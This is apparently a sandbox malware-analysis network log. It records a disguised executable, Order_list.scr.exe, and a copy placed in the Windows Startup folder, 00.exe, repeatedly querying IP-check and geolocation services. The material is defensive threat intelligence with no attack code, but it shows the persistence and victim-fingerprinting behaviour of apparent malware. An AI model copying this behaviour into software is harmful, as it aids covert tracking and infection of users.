Jan 13, 2025 10:12:28.707839012 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49769	132.226.247.73	80	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:29.327056885 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 10:12:30.023576975 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	104.21.64.1	443	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:06 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 09:12:06 UTC	871	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:06 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074315 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYFr%2BMZ8zBiFk%2Fj7q2xHrWgf%2F%2BXWfJ2GOwZPyYcX%2FdpPQ%2FHD%2BIzqN6SHFqeEkAbQUhtxNv%2F7zfCwqzj1QPY%2Bp5%2B%2BpSKE8EcjsGvdjijhRnktC6jMjZRESlcBOb6B3KwSYH8lc12B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014433ebcf7c358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1638&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1762220&cwnd=155&unsent_bytes=0&cid=cac4b7d62568a81d&ts=186&x=0"
2025-01-13 09:12:06 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	104.21.64.1	443	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:06 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 09:12:07 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074316 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WK4N63BTtF5htprUTyMbD1c%2BXVHO5vSNQuwd2kA8yVs%2F05MrWZb3BBge7g4bQl58aucvQvFVx52J2blGqpBaAw5iOlsOyCTtkBScwcCzy4zR37D2GqvWCBJxHMTk4Buew4W9XHd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901443442be94414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1661&rtt_var=642&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1680092&cwnd=180&unsent_bytes=0&cid=13b3d0052007952a&ts=157&x=0"
2025-01-13 09:12:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	104.21.64.1	443	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:08 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 09:12:08 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074317 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PnpI8i8LPT0PN9Bx49Kd1sthtekA6vkDvRXO7FhN2eEaoaymiu07Y4p3cbln0ZKwBz00RNTMicxBSGpGh5OP56tPqjP1UVSCcc5PmkQDEbmur61hzp4rvVv9%2Ba8MLXXqwXEZKjZb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014434d0df4de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1552&rtt_var=595&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1819314&cwnd=243&unsent_bytes=0&cid=84a181e7ef8d1817&ts=146&x=0"
2025-01-13 09:12:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	104.21.64.1	443	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:09 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 09:12:09 UTC	865	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:09 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074318 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ftnbq7TWDf0%2FW%2FksXs9c%2F6O8oTxMVW7p2XkHH%2BcEktbwT9zdb1M8ZAKJ4%2FIBttxLjs45Ymr8pw%2FEhOZSRJVA1CM%2BNr3IIkctSscU0qeFUR%2Bse9bxzh20VmvBkbci4499D3JPunXf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901443554dfd4414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1690&rtt_var=640&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1700640&cwnd=180&unsent_bytes=0&cid=a21e3d1dc43a375f&ts=134&x=0"
2025-01-13 09:12:09 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	104.21.64.1	443	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:11 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 09:12:11 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074320 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JnKbRGYqXz0GCU9dUCdhtftklQi7IrHabG2%2F8z31C%2FSFwkF7pCHze3a52GHZKkLhlvtbnnrwozpO4fw%2BXnZPUfdCBUdq%2FL5xa%2F9eVDhr3DeoL1wXjrrSXgl6BU5cmgdd3I4mHsvM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014435dafa17c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1974&rtt_var=749&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1452736&cwnd=218&unsent_bytes=0&cid=0df1691fab90dc54&ts=149&x=0"
2025-01-13 09:12:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	104.21.64.1	443	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:12 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 09:12:12 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074321 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2FoOy3EQfAL6taXAwlr5H85EuOttIKxvbLuPr9Obhmq2NRXfHoD6c0YOX0qocnbS8L1Doox7hGPZlS%2FTMIf9iKFMyoGIEG9OBch0jFJLB5Oxq8lYZMdFt1ARPx%2FK3%2BtykzX8oQBY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90144365cb638ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1934&rtt_var=740&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1463659&cwnd=168&unsent_bytes=0&cid=f015433920ab4bee&ts=139&x=0"
2025-01-13 09:12:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	104.21.64.1	443	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:13 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 09:12:13 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:13 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074322 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RfF9UZ%2BldHHAkzG1ZxD6vA6GOF441Znoskpw2YA8kI3PHVcq3av35MzhMQp4hE63NOY5oliBs%2B1K6MHEdvLvCpIOWBtLY0GbaVCYAMVWZMOFOy9w2Cuk4FCmnTdp4x%2FhUai8tkGL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014436df80d7c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1958&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1461461&cwnd=218&unsent_bytes=0&cid=d9aedc3c8ea1a8cc&ts=139&x=0"
2025-01-13 09:12:13 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	104.21.64.1	443	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:15 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 09:12:15 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074324 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=33sKB6%2FsZFCmPdI66NyfIzjfpUeyXXuEnjmDpRfIJEjvnG19qLmP6cIiRdl9RM4QEwBa7uFN1bXltMtPRD7p5DfEX%2Fsk9WPS2%2FJbGd3kj9BlhPHdleyt3Z9xdRCGssM%2BedtExHoC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901443762d76c358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1597&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1723730&cwnd=155&unsent_bytes=0&cid=e63e3c6470e868bf&ts=133&x=0"
2025-01-13 09:12:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	104.21.64.1	443	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 09:12:19 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074329 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2dkNaJ5gcIo5IrPGqgMIlfcpDO4qbz%2BUG%2FEa5TqwXc3p%2BTSv0A52fykZUWm3y1120TWcn7P3JMtAmtrnn%2BNbId7chRbe03CMln2lr2s9z4rluGvN84%2BYOUQq3UozLBI6oRHIFJk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901443948bca7c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1923&rtt_var=733&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1482233&cwnd=218&unsent_bytes=0&cid=f8abdf9d9ac70aea&ts=230&x=0"
2025-01-13 09:12:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	104.21.64.1	443	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:20 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
